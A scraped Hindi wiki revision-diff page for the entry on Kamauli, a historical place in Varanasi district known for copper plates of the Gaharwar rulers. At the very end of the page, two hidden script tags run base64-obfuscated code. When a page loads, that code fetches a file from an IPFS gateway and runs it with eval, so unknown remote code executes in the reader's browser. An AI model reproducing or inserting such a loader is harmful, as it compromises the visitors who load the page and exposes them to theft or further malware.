Difference between revisions of "कमौली"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "<references/> *पुस्तक- ऐतिहासिक स्थानावली, लेखक-विजयेन्द्र कुमार माथुर, प्रकाशन- राजस्थान ग्रंथ अका)
 
Line 1: Line 1:
{{पुनरीक्षण}}
 
*कमौली [[उत्तर प्रदेश]] राज्य के [[वाराणसी ज़िला|वाराणसी ज़िले]] में स्थित था।
 
*कमौली से मध्यकालीन गहरबार शासकों के अनेक ताम्रपत्र प्राप्त हुए हैं जिससे [[काशी]] पर उनका उस काल में आधिपत्य सिद्ध होता है।
 
  
{{प्रचार}}
+
*'''कमौली''' [[उत्तर प्रदेश |उत्तर प्रदेश राज्य]] के [[वाराणसी ज़िला|वाराणसी ज़िले]] में स्थित था।
+
*कमौली से मध्यकालीन '''गहरबार शासकों''' के अनेक ताम्रपत्र प्राप्त हुए हैं जिससे [[काशी]] पर उनका उस काल में आधिपत्य सिद्ध होता है।
{{संदर्भ ग्रंथ}}
+
 
 +
 
 +
 
 +
 
 +
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 +
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 138| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 
<references/>
 
<references/>
*ऐतिहासिक स्थानावली | विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
+
 
  
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
Line 15: Line 17:
 
{{उत्तर प्रदेश के ऐतिहासिक स्थान}}
 
{{उत्तर प्रदेश के ऐतिहासिक स्थान}}
 
[[Category:उत्तर प्रदेश]]
 
[[Category:उत्तर प्रदेश]]
[[Category:उत्तर प्रदेश के ऐतिहासिक स्थान]]
+
[[Category:उत्तर प्रदेश के ऐतिहासिक स्थान]][[Category:ऐतिहासिक स्थानावली]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 08:08, 31 May 2018

  • kamauli uttar pradesh rajy ke varanasi zile mean sthit tha.
  • kamauli se madhyakalin gaharabar shasakoan ke anek tamrapatr prapt hue haian jisase kashi par unaka us kal mean adhipaty siddh hota hai.



tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 138| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar


bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>